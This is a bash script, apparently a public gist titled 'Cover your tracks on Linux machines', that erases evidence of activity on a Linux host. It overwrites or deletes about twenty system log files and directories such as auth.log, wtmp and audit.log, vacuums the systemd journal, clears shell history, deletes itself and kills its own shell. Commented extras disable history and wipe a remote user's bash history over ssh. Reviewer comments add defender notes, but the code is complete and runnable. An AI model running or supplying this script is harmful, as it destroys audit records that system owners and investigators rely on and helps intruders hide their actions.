Cover your tracks on Linux machines! Article: https://samy.link/blog/is-professional-hackers-also-excellent-magicians
# Author: Naqwada (RuptureFarm 1029) <naqwada@pm.me> | |
# License: MIT License (http://www.opensource.org/licenses/mit-license.php) | |
# Docs: https://gitlab.com/-/snippets/2150636 | |
# Website: http://samy.link/ | |
# Linkedin: https://www.linkedin.com/in/samy-younsi/ | |
# Note: FOR EDUCATIONAL PURPOSE ONLY. | |
#!/bin/bash | |
# Paths that clearLogs goes on to overwrite (regular files) or empty
# (directories). Read defensively, this is a checklist of local evidence that
# anyone with write access to /var/log can destroy: ship these logs to a remote
# collector as they are written, and alert when one of them shrinks.
LOGS_FILES=( | |
/var/log/audit/audit.log # Audit TTY input | |
/var/log/auth.log # Authentication logs | |
/var/log/boot.log # System boot log | |
/var/log/cron.log # Crond logs | |
/var/log/faillog # Faillog records | |
/var/log/httpd # Apache access and error logs directory | |
/var/log/kern.log # Kernel logs | |
/var/log/lastlog # Last Login | |
/var/log/lighttpd # Lighttpd access and error logs directory | |
/var/log/maillog # Mail server logs | |
/var/log/messages # General message and system related stuff | |
/var/log/mysqld.log # MySQL database server log file | |
/var/log/qmail # Qmail log directory | |
/var/log/secure # Authentication log | |
/var/log/system.log # System Log | |
/var/log/tallylog # Tally Log | |
/var/log/utmp # Login records file | |
/var/log/wtmp # Login records file | |
/var/log/yum.log # Yum command log file | |
) | |
# Walks LOGS_FILES and wipes each entry that exists and is writable.
# Globals:  LOGS_FILES (read)
# Outputs:  "[+] <path> cleaned." or "[!] <path> is not writable! ..." on
#           stdout; an entry that is neither a regular file nor a directory
#           prints nothing.
# Defender note: the file branch overwrites the log in place, so a log from
# this list that suddenly shrinks to a single byte is a tamper indicator.
# Copies already forwarded to a remote collector are not touched by anything
# in this function.
function clearLogs () { | |
for i in "${LOGS_FILES[@]}" | |
do | |
if [ -f "$i" ]; then | |
if [ -w "$i" ]; then | |
# echo "" writes one newline, so the file is left 1 byte long, not empty.
echo "" > "$i" | |
echo "[+] $i cleaned." | |
else | |
echo "[!] $i is not writable! Retry using sudo." | |
fi | |
elif [ -d "$i" ]; then | |
if [ -w "$i" ]; then | |
# ${i:?} makes the shell abort if $i is empty, so the glob cannot become /*.
rm -rf "${i:?}"/* | |
echo "[+] $i cleaned." | |
else | |
echo "[!] $i is not writable! Retry using sudo." | |
fi | |
fi | |
done | |
} | |
# Asks journalctl to vacuum the systemd journal with --vacuum-time=3h, which
# removes archived journal files older than three hours; active journal files
# are not vacuumed.
# Globals:  EUID (read)
# The call is made only when EUID is non-zero, i.e. when the script is NOT
# running as root.
# Defender note: entries from the most recent hours fall outside what this
# command removes, so the journal stays worth collecting during triage.
# NOTE(review): whether an unprivileged vacuum removes anything depends on the
# journal file permissions of the host - confirm on the system under analysis.
function clearJournalctl () { | |
if [ "$EUID" -ne 0 ] | |
then | |
journalctl --vacuum-time=3h | |
fi | |
} | |
# Deletes the script itself, using the path it was invoked with ($0).
# Defender note: removing the file does not remove records made when it was
# started. Process-execution telemetry (for example audit or EDR exec events)
# that was shipped off-host before this point still shows the script path.
function selfDestructing () { | |
rm $0 | |
} | |
# Clears the shell's in-memory history list (-c) and writes the now-empty list
# to the history file (-w).
# NOTE(review): this acts on the shell process that runs the script. Whether
# that is the operator's interactive session depends on how the script was
# invoked, so the invoking user's history file may still hold evidence -
# confirm on the system under analysis.
function clearHistory () { | |
#Clear history for current session and make sure the changes are written to disk. | |
history -cw | |
} | |
# Ends the current shell by sending SIGKILL (-9) to its own PID ($$). SIGKILL
# cannot be caught, so the shell gets no chance to run its normal exit steps;
# the author's stated intent is to leave without history being saved.
function bye () { | |
#kill command to exit the session without saving history | |
kill -9 $$ | |
} | |
# Execution order: wipe the listed log files, vacuum the journal, clear shell
# history, delete this script, then SIGKILL the shell.
# Defender note: every step acts on local state only. Log copies held by a
# remote collector and any telemetry already sent off-host are out of reach of
# this sequence, so central logging is the main mitigation.
clearLogs | |
clearJournalctl | |
clearHistory | |
selfDestructing | |
bye | |
# -- Additional commands -- | |
# Disable history for current shell session | |
# HISTFILE=/dev/null | |
# Don't save commands in bash history (only for current session) | |
# ssh user@hostname.domain "> ~/.bash_history" |